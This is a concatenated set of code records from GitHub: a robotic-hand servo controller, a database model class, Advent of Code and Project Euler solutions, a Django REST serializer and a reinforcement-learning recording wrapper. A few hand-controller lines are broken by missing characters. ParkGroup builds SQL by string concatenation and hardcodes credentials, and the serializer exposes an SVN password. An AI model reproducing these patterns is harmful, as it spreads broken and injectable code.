self.readHand()\n\n\t\tif val 0.05):\n\t\t\tprint( '[ERR] Hand must be in pinch_close mode before sweep')\n\t\t\treturn\n\n\t\tamnts,encs = self.readHand() #record starting pose to return to\n\t\tif val == None:\n\t\t\tval=amnts[1]+0.10\n\t\tself.shift(1,val,7)\n\t\ttime.sleep(0.5)\n\t\tself.shift(2,val,14)\n\t\ttime.sleep(0.5)\n\t\tself.shift(1,val-0.05,12)\n\t\ttime.sleep(0.5)\n\t\tself.shift(2,val-0.05,12)\n\t\ttime.sleep(0.5)\n\t\tself.shift(1,amnts[1],10)\n\t\ttime.sleep(self.pause)\n\t\tprint( \"Sweep Completed..\")\n\n\t#jiggling the fingers closed\n\tdef close_jiggle(self,amnt=0.5,da=0.05,nsteps=5,pause=0.25):\n\t\tamnt_start,amnt_enc = self.readHand()\n\t\ts_amnt = amnt_start[0]\n\t\tif s_amnt<0.5:\n\t\t\tprint( \"[WARNING] Fingers may be spread too far apart for closing motion\")\n\t\t\tprint( \"Consider moving fingers to adduction value of greater than 0.5\")\n\n\t\tamnt_goal = np.array([amnt,amnt,amnt,s_amnt])\n\t\tda_arr = np.array([da,-da,0.,0.])\n\t\tfor i in range(nsteps):\n\t\t\tamnt_curr=self.readHand()\n\t\t\tamnt_arr = amnt_start+(amnt_goal-amnt_curr)*float(i)/nsteps+da_arr*(-1)**i\n\n\t\t\tself.moveHand(amnt_arr)\n\t\t\ttime.sleep(pause)\n\t\tself.moveHand(amnt_goal)\n\n\nclass Model_T42(OpenHand):\n\tservo_speed = 0.25\n\tmax_torque = 1\n\tmodes = [True, True] #True if in position control\n\n\tmax_close = 0.75\n\tmotorDir = [1,1]\n\tmotorMin = [0.05,0.05]\n\tmotorMax = [motorMin[0]+max_close,motorMin[1]+max_close]\n\n\tHAND_HEIGHT = 0.08\n\tWRIST_OFFSET = -5*np.pi/12\n\n\tdef __init__(self,port=\"/dev/ttyUSB0\",s1=1,s2=2,dyn_model=\"RX\", s1_min = motorMin[0], s2_min = motorMin[1]):\n\t\t#s1: \"forefinger\"\n\t\t#s2: \"thumb\"\n\t\tmot_offset = [s1_min,s2_min]\n\n\t\tif(mot_offset != self.motorMin): #update motor mins if initialized to different values\n\t\t\tprint( 'Setting new motor minimums... 
')\n\t\t\tself.motorMin = mot_offset\n\t\t\tself.motorMax = [self.motorMin[0]+self.max_close,self.motorMin[1]+self.max_close]\n\n\t\tOpenHand.__init__(self,port,[s1,s2],dyn_model)\n\n\t#default OpenHand commands:\n\tdef reset(self):\n\t\tself.release()\n\n\tdef close(self,amnt=0.45):\t#position-based closing mechanism\n\t\tself.moveMotor(0,amnt)\n\t\tself.moveMotor(1,amnt)\n\n\tdef change_motor_min(self,index, val):\n\t\tif (index < 0 or index >= len(self.servos)):\n\t\t\tprint( \"[ERR] invalid motor index \"+repr(index))\n\t\telse:\n\t\t\tself.motorMin[index]=val\n\t\t\tself.motorMax[index]=val+self.max_close\n\n\t\t\tself.reset()\n\t\t\tprint( 'Index changed successfully...')\n\n\tdef followTrajectory(self):\t#position-based closing mechanism\n\t\tact1inputs = np.array([0.6777,0.6854,0.6820,0.6762,0.6705,0.6531,0.6363,0.6256,0.6162,0.6053,0.6012,0.5963,0.5935,0.5905,0.5888,0.5864,0.5846,0.5815,0.5782,0.5729,0.5654,0.5555,0.5467,0.5381,0.5317,0.5283,0.5274,0.5272,0.5271,0.5232,0.5179,0.5077,0.4962,0.4845,0.4764,0.4695,0.4669,0.4654,0.4624,0.4589,0.4556,0.4527,0.4502,0.4493,0.4491,0.4490,0.4490,0.4490,0.4490,0.4490])\n\t\tact2inputs = np.array([0.6629,0.6726,0.6733,0.6751,0.6788,0.6784,0.6780,0.6791,0.6796,0.6753,0.6741,0.6728,0.6722,0.6717,0.6716,0.6717,0.6722,0.6726,0.6738,0.6751,0.6756,0.6754,0.6758,0.6758,0.6784,0.6818,0.6855,0.6858,0.6858,0.6827,0.6792,0.6762,0.6761,0.6759,0.6728,0.6675,0.6617,0.6560,0.6522,0.6514,0.6524,0.6533,0.6535,0.6520,0.6504,0.6497,0.6492,0.6491,0.6490,0.6490])\n\n\t\tself.moveMotor(0,0.15)\n\t\tself.moveMotor(1,0.31)\n\n\t\ttime.sleep(1)\n\n\t\tfor i in range(len(act1inputs)):\n\t\t\ttime.sleep(0.25)\n\t\t\tprint( \"thumb: %.2f\" % Decimal(act1inputs[i]*(0.50-0.15)+0.05))\n\t\t\tprint( \"2-link: %.2f\" % Decimal(act2inputs[i]*(0.65-0.10)+0.05))\n\t\t\tself.moveMotor(1,act1inputs[i]*(0.50-0.15)+0.) 
#1 link\n\n\t\t\ttime.sleep(0.05)\n\t\t\tself.moveMotor(0,act2inputs[i]*(0.65-0.10)+0.05) #2 link\n\n\t\t\t#gaitHand(self,vals,num=5,overshoot=0.5,release=True)\n\n\tdef shootOutRight(self,shift_amnt=0.4,close_amt=0.25):\n\t\tself.release()\n\t\ttime.sleep(1)\n\t\tself.moveMotor(0,shift_amnt)\n\t\ttime.sleep(1)\n\t\tself.close(close_amt-0.10)\n\t\ttime.sleep(1)\n\t\tself.close(close_amt)\n\n\tdef shootOutLeft(self,shift_amnt=0.37,close_amt=0.3):\n\t\tself.release()\n\t\ttime.sleep(1)\n\t\tself.moveMotor(1,shift_amnt)\n\t\ttime.sleep(1)\n\t\tself.close(close_amt)\n\n\tdef close_pause(self, amnt=0.45): # position-based closing mechanism\n\t\tself.moveMotor(0, amnt)\n\t\tself.moveMotor(1, amnt)\n\t\ttime.sleep(self.pause)\n\n\tdef release(self):\n\t\tself.moveMotor(0,self.amnt_release)\n\t\tself.moveMotor(1,self.amnt_release)\n\n\t#model-specific OpenHand commands:\n\tdef flip_init(self):\n\t\tself.moveMotor(0,self.amnt_release)\n\t\tself.moveMotor(1,self.amnt_close)\n\n\tdef move_right(self,val,close_amnt):\n\t\t#self.getCurrDir()\n\t\tfor i in range(0, 1):\n\t\t\ttime.sleep(self.pause * 2) #time to settle\n\t\t\tamnt, enc = self.readMotor(1)\n\t\t\tself.moveMotor(0,amnt + val)\n\t\t\tself.moveMotor(1,amnt - val)\n\t\t\ttime.sleep(self.pause * 2)\n\t\t\tself.close(close_amnt)\n\t\t#self.saveActVals()\n\n\tdef gait_right(self, val, num, close_amnt):\n\t\tself.getCurrDir()\n\t\tfor i in range(0, 1):\n\t\t\ttime.sleep(self.pause * 2) # time to settle\n\t\t\tamnt, enc = self.readMotor(1)\n\t\t\tinc = val/num\n\t\t\tfor i in range(0,num):\n\t\t\t\tself.moveMotor(1, amnt - i*inc)\n\t\t\t\ttime.sleep(self.pause)\n\t\t\t\tself.moveMotor(0, amnt + i * inc)\n\t\t\t\ttime.sleep(self.pause)\n\t\t\ttime.sleep(self.pause * 2)\n\t\t\tself.close(close_amnt)\n\t\tself.saveActVals()\n\n\tdef move_left(self,val,close_amnt):\n\t\tself.getCurrDir()\n\t\tfor i in range(0, 1):\n\t\t\ttime.sleep(self.pause * 2)\n\t\t\tamnt, enc = self.readMotor(1)\n\t\t\tself.moveMotor(1, amnt + val)\n\t\t\tself.moveMotor(0, amnt - val)\n\t\t\ttime.sleep(self.pause * 2)\n\t\t\tself.close(close_amnt)\n\t\tself.saveActVals()\n\n\tdef gait_left(self, val, num,close_amnt):\n\t\tself.getCurrDir()\n\t\tfor i in range(0, 1):\n\t\t\ttime.sleep(self.pause * 2) # time to settle\n\t\t\tamnt, enc = self.readMotor(1)\n\t\t\tinc = val / num\n\t\t\tfor i in range(0, num):\n\t\t\t\tself.moveMotor(1, amnt + i * inc)\n\t\t\t\ttime.sleep(self.pause)\n\t\t\t\tself.moveMotor(0, amnt - i * inc)\n\t\t\t\ttime.sleep(self.pause)\n\t\t\ttime.sleep(self.pause * 2)\n\t\t\tself.close(close_amnt)\n\t\tself.saveActVals()\n\n\tdef pull_in(self,val1,val2,close_amnt):\n\t\tself.getCurrDir()\n\t\tfor i in range(0, 1):\n\t\t\ttime.sleep(self.pause * 2)\n\t\t\tamnt, enc = self.readMotor(1)\n\t\t\tself.moveMotor(1, amnt - val2)\n\t\t\tself.moveMotor(0,amnt + val1)\n\t\t\t#time.sleep(self.pause * 2)\n\t\t\ttime.sleep(self.pause * 2)\n\t\t\tself.close(close_amnt)\n\t\tself.saveActVals()\n\n\tdef gait_in(self, val1, val2, num,close_amnt):\n\t\tself.getCurrDir()\n\t\tfor i in range(0,1):\n\t\t\ttime.sleep(self.pause * 2)\n\t\t\tamnt, enc = self.readMotor(1)\n\t\t\tinc2 = val2 / num\n\t\t\tinc1 = val1 / num\n\t\t\tfor i in range(0, num):\n\t\t\t\tself.moveMotor(1, amnt - inc2 * i)\n\t\t\t\ttime.sleep(self.pause)\n\t\t\t\tself.moveMotor(0, amnt + inc1 * i)\n\t\t\t\ttime.sleep(self.pause)\n\t\t\t# time.sleep(self.pause * 2)\n\t\t\ttime.sleep(self.pause * 2)\n\t\t\tself.close(close_amnt)\n\t\tself.saveActVals()\n\n\n\tdef move_out(self): #questionable if this could even 
work\n\t\ttime.sleep(self.pause * 2)\n\t\tamnt, enc = self.readMotor(1)\n\t\tfor i in range (1,11):\n\n\t\t\t#move_right\n\t\t\ttime.sleep(self.pause) # time to settle\n\t\t\tself.moveMotor(0, amnt + 0.01*i)\n\t\t\tself.moveMotor(1, amnt - 0.01*i)\n\t\t\t#move_left\n\t\t\ttime.sleep(self.pause)\n\t\t\tself.moveMotor(0, amnt - 0.01*i)\n\t\t\ttime.sleep(self.pause)\n\t\t\tself.moveMotor(1, amnt + 0.01*i)\n\t\ttime.sleep(self.pause * 2)\n\n\tdef flip_close(self):\n\t\tself.moveMotor(0,self.amnt_close)\n\t\tself.moveMotor(1,self.amnt_close)\n\n\n\t# demo motion that moves object back and forth with shift (assumes symmetry in operation)\n\tdef sweep(self, val):\n\t\tamnts, encs = self.readHand() # record starting pose to return to\n\t\tself.shift(0, val)\n\t\ttime.sleep(self.pause)\n\t\tself.shift(1, val)\n\t\ttime.sleep(self.pause * 3)\n\t\tself.shift(0, amnts[0])\n\t\ttime.sleep(self.pause)\n\t\tself.shift(0, amnts[1])\n\t\ttime.sleep(self.pause)\n\t\tself.moveHand(amnts)\n\n\n\t# assumes operation starts with grasp w/ full contact\n\t# either pushing or relaxing a finger towards a desired position\n\tdef shift(self, index, val):\n\t\tother_index = (index + 1) % 2\n\t\tvals, encs = self.readHand()\n\n\t\tif val < vals[index]:\n\t\t\tself.torqueMotor(index, 0.)\n\t\t\tself.moveMotor(other_index, vals[other_index] + (vals[index] - val))\n\t\telse:\n\t\t\tself.torqueMotor(other_index, 0.)\n\t\t\tself.moveMotor(index, val)\n\n\t\ti = 0\n\t\twhile i < 10: # arbitrary step count to 10 as system settles\n\t\t\ts_val, s_enc = self.readMotor(index)\n\t\t\ts_val_err = abs(s_val - val)\n\t\t\tprint( \"Shifting error: \" + repr(round(s_val_err, 4)))\n\t\t\tif s_val_err < 0.01:\n\t\t\t\tbreak\n\t\t\ttime.sleep(self.pause)\n\t\t\ti += 1\n\n\t\tprint( \"Final shift error: \" + repr(round(s_val_err, 4)))\n\t\tself.hold()\n\t\treturn s_val_err\n\nclass Model_T(OpenHand):\n\tmax_torque = 0.4\n\tlimit_close = 10\t\t#counter for a standard close (to prevent servo stuck in closing mode in event of tendon failure)\n\n\tmodes = [True]\n\n\tmax_close = 0.75\n\tmotorDir = [1]\n\tmotorMin = [0.05]\n\tmotorMax = [motorMin[0]+max_close]\n\n\tHAND_HEIGHT = 0.14\n\tWRIST_OFFSET = -np.pi/4\n\n\tdef __init__(self,port=\"/dev/ttyUSB0\",s1=1,dyn_model=\"MX\", s1_min = motorMin[0]):\n\n\t\tmot_offset = [s1_min]\n\t\tif(mot_offset != self.motorMin): #update motor mins if initialized to different values\n\t\t\tprint( 'Setting new motor minimums... 
')\n\t\t\tself.motorMin = mot_offset\n\t\t\tself.motorMax = [self.motorMin[0]+self.max_close]\n\n\t\tOpenHand.__init__(self,port,[s1],dyn_model)\n\n\tdef reset(self):\n\t\tself.moveMotor(0,self.amnt_release)\n\n\t#may exceed encoder limit, especially depending on the servo used\n\tdef close_torque(self,amnt=0.5):\n\t\tself.servos[0].enable_torque_mode()\n\t\tself.servos[0].apply_torque(amnt*self.max_torque)\n\t\ttime.sleep(self.pause*2)\n\n\t\ti,sp = 0,1.\n\t\twhile i0:\n\t\t\tsp = self.servos[0].read_speed()\n\t\t\tprint( \"close (speed): \"+repr(sp))\n\t\t\ti += 1\n\t\t\ttime.sleep(self.pause)\n\n\t\tself.servos[0].disable_torque_mode()\n\t\tself.preventLoadError(0)\n\t\treturn True\n\n\tdef change_motor_min(self,index, val):\n\t\tif (index < 0 or index >= len(self.servos)):\n\t\t\tprint( \"[ERR] invalid motor index \"+repr(index))\n\t\telse:\n\t\t\tself.motorMin[0]=val\n\t\t\tself.motorMax[0]=val+self.max_close\n\t\t\tself.reset()\n\t\t\tprint( 'Index changed successfully...')\n\n\tdef close_wheel(self,amnt=0.5,speed=0.2):\t#closing through wheel mode\n\t\t#set torque output to max, use wheel speed to modulate closing force\n\t\tself.servos[0].disable_torque_mode()\n\t\tself.servos[0].init_cont_turn()\n\t\tself.servos[0].apply_speed(speed)\n\t\ttime.sleep(self.pause*2)\n\n\t\ti,sp = 0,1.\n\t\twhile i0:\n\t\t\tsp = self.servos[0].read_speed()\n\t\t\tprint( \"close (speed): \"+repr(sp))\n\t\t\ti += 1\n\t\t\ttime.sleep(self.pause)\n\n\t\tself.servos[0].kill_cont_turn()\n\t\tself.preventLoadError(0)\n\t\treturn True\n\n\tdef close(self,amnt=0.2):\t\t\t#closing through position mode and torque limit\n\t\t#set target position to furthest limit, but change servo torque limit\n\t\tself.servos[0].apply_max_torque(amnt)\n\t\ttime.sleep(self.pause)\n\t\tself.servos[0].move_to_encoder(self.servos[0].settings['max_encoder']-1)\n\t\ttime.sleep(self.pause)\n\n\t\ti,sp = 0,1.\n\t\twhile i0:\n\t\t\tsp = self.servos[0].read_speed()\n\t\t\tprint( \"close (speed): \"+repr(sp))\n\t\t\ti += 1\n\t\t\ttime.sleep(self.pause)\n\n\t\tself.preventLoadError(0)\n\t\tself.servos[0].apply_max_torque(self.max_torque)\n\t\treturn True\n\n\tdef release(self):\t\t\t\t\t#should work for all previous close cases\n\t\tself.servos[0].enable_torque_mode()\n\n\t\tself.servos[0].apply_torque(0.)\t\t\t#allow natural compliance to loosen grasp for tight grip cases\n\t\ttime.sleep(self.pause*2)\n\n\t\tself.servos[0].disable_torque_mode()\n\n\t\tself.servos[0].kill_cont_turn()\t\t\t#back to position mode\n\t\tself.servos[0].apply_speed(self.servo_speed)\t#check in case it was in wheel mode\n\t\tself.moveMotor(0,self.amnt_release)\n","repo_name":"grablab/openhand_node","sub_path":"src/openhand_node/hands.py","file_name":"hands.py","file_ext":"py","file_size_in_byte":29801,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"92"} +{"seq_id":"3427229334","text":"#!/usr/bin/python\r\n\r\nfrom DBAccess import DBAccess\r\nfrom Park import Park\r\n\r\nclass ParkGroup(DBAccess) :\r\n TABLENAME = 'parkgroup'\r\n \r\n def __init__(self, wherecursor) :\r\n super().__init__(ParkGroup.TABLENAME, wherecursor)\r\n\r\n @staticmethod\r\n def getParkGroups(wherecursor = '') :\r\n if type(wherecursor) == str :\r\n qry = \"SELECT * FROM \" + ParkGroup.TABLENAME\r\n if wherecursor != '' :\r\n qry += \" WHERE \" + wherecursor\r\n\r\n cursor = ParkGroup.connector.cursor()\r\n cursor.execute(qry)\r\n parkgroups = ParkGroup.getParkGroups(cursor)\r\n cursor.close()\r\n return parkgroups\r\n\r\n else : \r\n parkgroups 
= list()\r\n while True :\r\n parkgroup = ParkGroup(wherecursor)\r\n if parkgroup.isEmpty() :\r\n break\r\n parkgroups.append(parkgroup)\r\n return parkgroups\r\n\r\n @staticmethod\r\n def getParkGroupsByField(fieldname, fieldvalue) : \r\n where = fieldname + \" = '\" + str(fieldvalue) + \"'\"\r\n return ParkGroup.getParkGroups(where)\r\n\r\n def getParks(self) :\r\n return Park.getParksByField('parkgroupid', self.getAttr('id'))\r\n\r\n @staticmethod\r\n def insert(attrs) : \r\n # zero-argument super() is unavailable inside a staticmethod, so call the base class directly\r\n id = DBAccess.insert(ParkGroup.TABLENAME, attrs)\r\n where = \"id = \" + str(id)\r\n group = ParkGroup(where)\r\n return group\r\n\r\n\r\nif __name__ == '__main__' : \r\n ParkGroup.connect('192.168.0.19', 'concierge', 'concierge', 'concierge')\r\n\r\n parkgroups = ParkGroup.getParkGroups()\r\n for parkgroup in parkgroups : \r\n print('[TEST] name: [' + parkgroup.getAttr('name') + ']')\r\n\r\n parkgroup = ParkGroup.getParkGroupsByField('name', 'Walt Disney World Resort')[0]\r\n print('[TEST] short: [' + parkgroup.getAttr('short') + ']')\r\n parks = parkgroup.getParks()\r\n for park in parks : \r\n print('[TEST] name: [' + park.getAttr('name') + ']')\r\n\r\n\r\n","repo_name":"fabiomazzarino/scrapinghub","sub_path":"ParkGroup.py","file_name":"ParkGroup.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
{"seq_id":"38379857313","text":"import tensorflow as tf\n\n# sess and global step\nsess_config = tf.ConfigProto()\n# fixed percentage of GPU memory\nsess_config.gpu_options.per_process_gpu_memory_fraction = 0.4\n# dynamic growth\nsess_config.gpu_options.allow_growth = True\nsess = tf.Session(config=sess_config)\nglobal_steps = tf.Variable(0, trainable=False)\n\n# env.\nimport os\n\n# set GPU\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\n# about log\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '0' # default: print all messages\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '1' # suppress INFO messages\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' # suppress INFO and WARNING messages\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' # suppress INFO, WARNING, ERROR messages\n\n# pycharm2shell\nimport sys\nsys.path.append('../')\n","repo_name":"KirinNg/Machine_Learning_Tools_Code_TF","sub_path":"code_for_buildup_training/sess&env.py","file_name":"sess&env.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"92"}
{"seq_id":"40747713596","text":"import numpy as np\n\n\nclass IndexFinder:\n\n def __init__(self, min_idx, max_idx, priority):\n self.min_idx = int(min_idx)\n self.max_idx = int(max_idx)\n self.idx = int(max_idx / 2)\n self.priority = priority\n\n def next_search_idx(self, n_boards):\n if self.priority == \"first\":\n return self._idx_towards_first(n_boards)\n elif self.priority == \"last\":\n return self._idx_towards_last(n_boards)\n\n def _idx_towards_first(self, n_boards):\n if n_boards > 1:\n self.max_idx = self.idx\n self.idx = self.idx - int((self.idx - self.min_idx) / 2)\n else:\n self.min_idx = self.idx\n self.idx = self.idx + int((self.max_idx - self.idx) / 2)\n return self.idx\n\n def _idx_towards_last(self, n_boards):\n if n_boards > 0:\n self.min_idx = self.idx\n self.idx = self.idx + int((self.max_idx - self.idx) / 2)\n else:\n self.max_idx = self.idx\n self.idx = self.idx - int((self.idx - self.min_idx) / 2)\n return self.idx\n\n\ndef get_first_board(numbers, boards, board_size):\n potential_boards = boards\n idx_finder = IndexFinder(0, numbers.shape[0], \"first\")\n idx = idx_finder.idx\n while potential_boards.shape[0] != 1:\n bingo_boards = 
has_bingo(potential_boards, numbers[:idx], board_size)\n potential_boards = potential_boards[bingo_boards]\n idx = idx_finder.next_search_idx(potential_boards.shape[0])\n return {\"board\": potential_boards,\n \"idx\": idx}\n\n\ndef get_last_board(numbers, boards, board_size):\n potential_boards = boards\n idx_finder = IndexFinder(0, numbers.shape[0], \"last\")\n idx = idx_finder.idx\n while potential_boards.shape[0] != 1:\n bingo_boards = has_bingo(boards, numbers[:idx], board_size)\n potential_boards = boards[~bingo_boards]\n idx = idx_finder.next_search_idx(potential_boards.shape[0])\n return {\"board\": potential_boards,\n \"idx\": idx}\n\n\ndef has_bingo(boards, numbers, board_size):\n # Check which boards have bingo\n has_numbers = np.isin(boards, numbers)\n bingo_axis_1 = np.sum(np.sum(has_numbers, axis=1) >= board_size, axis=1)\n bingo_axis_2 = np.sum(np.sum(has_numbers, axis=2) >= board_size, axis=1)\n bingo_boards = np.logical_or(bingo_axis_1, bingo_axis_2)\n return bingo_boards\n\n\ndef get_bingo_number_idx(numbers, potential_boards, idx, board_size):\n # Find marked numbers in the final board\n matching_numbers = np.isin(potential_boards, numbers[:idx])\n bingo_col = np.sum(matching_numbers, 1) == board_size\n bingo_row = np.sum(matching_numbers, 2) == board_size\n\n # Extract the numbers in the bingo line\n if np.sum(bingo_col):\n bingo_numbers = potential_boards[0, :, bingo_col[0]]\n else:\n bingo_numbers = potential_boards[0, bingo_row[0], :]\n\n # Find when the numbers in the bingo line were called and pick the last\n called_idxs = np.argwhere(np.isin(numbers[:idx], bingo_numbers[0]))\n return np.max(called_idxs)\n\n\ndef get_score(numbers, last_board, bingo_number_idx):\n last_called = numbers[bingo_number_idx]\n uncalled = ~np.isin(last_board, numbers[:bingo_number_idx + 1])\n total_uncalled = np.sum(last_board[uncalled])\n return last_called * total_uncalled\n\n\nif __name__ == \"__main__\":\n # Read data\n numbers = np.loadtxt(\"data/day4_numbers.txt\", dtype=np.int_, delimiter=\",\")\n boards = np.loadtxt(\"data/day4_boards.txt\", dtype=np.int_)\n\n # Board info\n board_size = boards.shape[1]\n\n # Rearrange data\n boards = np.array(np.split(boards, int(boards.shape[0] / board_size)))\n\n # Part 1\n first_board = get_first_board(numbers, boards, board_size)\n bingo_number_idx = get_bingo_number_idx(numbers, first_board[\"board\"],\n first_board[\"idx\"], board_size)\n print(get_score(numbers, first_board[\"board\"], bingo_number_idx))\n\n # Part 2\n last_board = get_last_board(numbers, boards, board_size)\n bingo_number_idx = get_bingo_number_idx(numbers, last_board[\"board\"],\n last_board[\"idx\"], board_size)\n print(get_score(numbers, last_board[\"board\"], bingo_number_idx))\n","repo_name":"the-freja/AdventOfCode2021","sub_path":"day4.py","file_name":"day4.py","file_ext":"py","file_size_in_byte":4249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"4451557123","text":"import math\n\ndef euler63():\n \n total = 0 \n \n \n for currN in range(1,22):\n for currP in range(1,10):\n currPowered = (int(math.pow(currP,currN)))\n if(len(str(currPowered))==currN):\n total+=1\n \n print(total)\n \n \n \n \n\neuler63()","repo_name":"msimmara/NoSpeulers","sub_path":"Euler/euler63.py","file_name":"euler63.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"40984498058","text":"\"\"\" Implements an action recording 
wrapper. \"\"\"\nfrom typing import Dict, Any, Tuple, Optional, Union\n\nfrom pathlib import Path\n\nfrom maze.core.annotations import override\nfrom maze.core.env.core_env import CoreEnv\nfrom maze.core.env.maze_action import MazeActionType\nfrom maze.core.env.maze_env import MazeEnv\nfrom maze.core.env.maze_state import MazeStateType\nfrom maze.core.trajectory_recording.records.action_record import ActionRecord\nfrom maze.core.wrappers.wrapper import ObservationWrapper, Wrapper\n\n\nclass ActionRecordingWrapper(Wrapper[MazeEnv]):\n \"\"\"An Action Recording Wrapper that records for (sub-)step the respective MazeAction or agent action taken.\n\n :param env: Environment to wrap.\n :param record_maze_actions: If True maze action objects are recorded.\n :param record_actions: If True agent actions are recorded.\n :param output_dir: Path where to store the action records.\n \"\"\"\n\n def __init__(self, env: MazeEnv, record_maze_actions: bool, record_actions: bool,\n output_dir: str = 'action_records'):\n super().__init__(env)\n self.record_maze_actions = record_maze_actions\n self.record_actions = record_actions\n\n self.action_record = None\n self._episode_id = None\n self._current_seed = None\n self._cum_reward = None\n\n self.output_dir = Path(output_dir)\n self.output_dir.mkdir(parents=True, exist_ok=True)\n\n @override(ObservationWrapper)\n def step(self, action) -> Tuple[Any, Any, bool, Dict[Any, Any]]:\n \"\"\"Intercept ``ObservationWrapper.step`` and map observation.\"\"\"\n\n # get current actor id\n actor_id = self.env.actor_id()\n curr_env_time = self.env.get_env_time()\n\n # take actual step\n observation, reward, done, info = self.env.step(action)\n self._cum_reward += reward\n\n # record action taken\n last_action = self.env.get_maze_action()\n if self.record_maze_actions:\n self.action_record.set_maze_action(curr_env_time, maze_action=last_action)\n\n if self.record_actions:\n self.action_record.set_agent_action(curr_env_time, actor_id=actor_id, action=action)\n\n return observation, reward, done, info\n\n @override(CoreEnv)\n def seed(self, seed: int) -> None:\n \"\"\"Sets the seed for this environment's random number generator(s).\n\n :param: seed: the seed integer initializing the random number generator.\n \"\"\"\n self._current_seed = seed\n self.env.seed(seed)\n\n @override(ObservationWrapper)\n def reset(self) -> Any:\n \"\"\"Intercept ``ObservationWrapper.reset`` and map observation.\"\"\"\n\n # make sure that the episode is seeded properly\n assert self._current_seed is not None\n\n # dump previous trajectory\n self.dump()\n\n self.action_record = ActionRecord(seed=self._current_seed)\n obs = self.env.reset()\n self._cum_reward = 0.0\n\n self._episode_id = self.env.get_episode_id()\n\n # clear seed to make sure that the next episode is again seeded properly\n self._current_seed = None\n\n return obs\n\n def dump(self) -> None:\n \"\"\"Dump recorded trajectory to file.\n \"\"\"\n output_path = self.output_dir / f\"{self._episode_id}.pkl\"\n if self.action_record is not None:\n # set cumulative reward\n self.action_record.cum_action_record_reward = self._cum_reward\n # dump record\n self.action_record.dump(output_path)\n\n def clone_from(self, env: 'ActionRecordingWrapper') -> None:\n \"\"\"Reset this gym environment to the given state by creating a deep copy of the `env.state` instance variable\"\"\"\n raise RuntimeError(\"Cloning the 'ActionRecordingWrapper' is not supported.\")\n\n def get_observation_and_action_dicts(self, maze_state: Optional[MazeStateType],\n 
maze_action: Optional[MazeActionType], first_step_in_episode: bool) \\\n            -> Tuple[Optional[Dict[Union[int, str], Any]], Optional[Dict[Union[int, str], Any]]]:\n        raise NotImplementedError\n","repo_name":"enlite-ai/maze","sub_path":"maze/core/wrappers/action_recording_wrapper.py","file_name":"action_recording_wrapper.py","file_ext":"py","file_size_in_byte":4118,"program_lang":"python","lang":"en","doc_type":"code","stars":250,"dataset":"github-code","pt":"92"}
{"seq_id":"74346465578","text":"# -*- encoding: utf-8 -*-\n\nimport json\nfrom datetime import date, datetime\nfrom django.conf import settings\n\nfrom django.contrib.auth import get_user_model\nfrom rest_framework import serializers\nfrom rest_framework.reverse import reverse\n\nfrom .models import Build, Job\n\nUser = get_user_model()\n\n\nclass JobSerializer(serializers.ModelSerializer):\n    links = serializers.SerializerMethodField()\n    violation_info = serializers.SerializerMethodField()\n\n    class Meta:\n        model = Job\n        fields = ('id', 'name', 'description',\n                  'svn_url', 'svn_username', 'svn_password',\n                  'recipient', 'violation_threshold_num', 'links', 'violation_info')\n\n    def get_violation_info(self, obj):\n        last_builds = obj.builds.order_by('-number')[:1]\n        violation_info = {\n            \"violation_file_num\": -1,\n            'violation_num': -1,\n            'created': '0-0-0 0:0:0',\n            'health_url': '/static/img/rain.png',\n            'report_url': ''\n        }\n        if not last_builds:\n            return violation_info\n        last_build = last_builds[0]\n        build_info = json.loads(last_build.result)\n\n        violation_info = build_info['violation_info']\n        if violation_info['violation_num'] >= obj.violation_threshold_num:\n            health_url = '/static/img/rain.png'\n        else:\n            health_url = '/static/img/sun.png'\n\n        violation_info.update({\n            'created': build_info['datetime'],\n            'health_url': health_url,\n            'report_url': settings.JENKINS_URL + '/job/{job_name}/violations/'.format(job_name=obj.name)\n        })\n\n        return violation_info\n\n    def get_links(self, obj):\n        request = self.context['request']\n        return {\n            'self': reverse('job-detail', kwargs={'pk': obj.pk}, request=request)\n        }\n\n\nclass BuildSerializer(serializers.ModelSerializer):\n    links = serializers.SerializerMethodField()\n\n    class Meta:\n        model = Build\n        fields = ('id', 'number', 'created', 'job', 'result', 'links')\n\n    def get_links(self, obj):\n        request = self.context['request']\n        links = {\n            'self': reverse('build-detail', kwargs={'pk': obj.pk}, request=request),\n            'job': None,\n        }\n        # Note: sprint_id is used here, while assigned uses obj.assigned.\n        if obj.job:\n            links['job'] = reverse(\n                'job-detail', kwargs={'pk': obj.job_id}, request=request)\n\n        return links\n\n    def validate(self, attrs):\n        return attrs\n","repo_name":"510908220/python-code-check","sub_path":"src/app/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2543,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"92"}
{"seq_id":"25180667359","text":"import re\nimport sys\n\nclass VM(object):\n    def __init__(self, mem):\n        self.acc = 0\n        self.pc = 0\n        self.mem = mem\n\n    @staticmethod\n    def parse_instruction(i):\n        opcode, sgn, arg = re.match(r'(.*) ([+\\-])(\\d+)', i).groups()\n        return opcode, 1 if sgn == '+' else -1, int(arg)\n    \n    def execute(self):\n        opcode, sgn, arg = self.mem[self.pc]\n        print(\"Executing\", opcode, '+' if sgn > 0 else '-', arg, \"(\", self.acc, self.pc, \")\")\n        if opcode == 'acc':\n            self.acc += sgn * arg\n            self.pc += 1\n        elif opcode == 'jmp':\n            self.pc += sgn * arg\n        else:\n            self.pc += 1\n\nM = []\nfor line in 
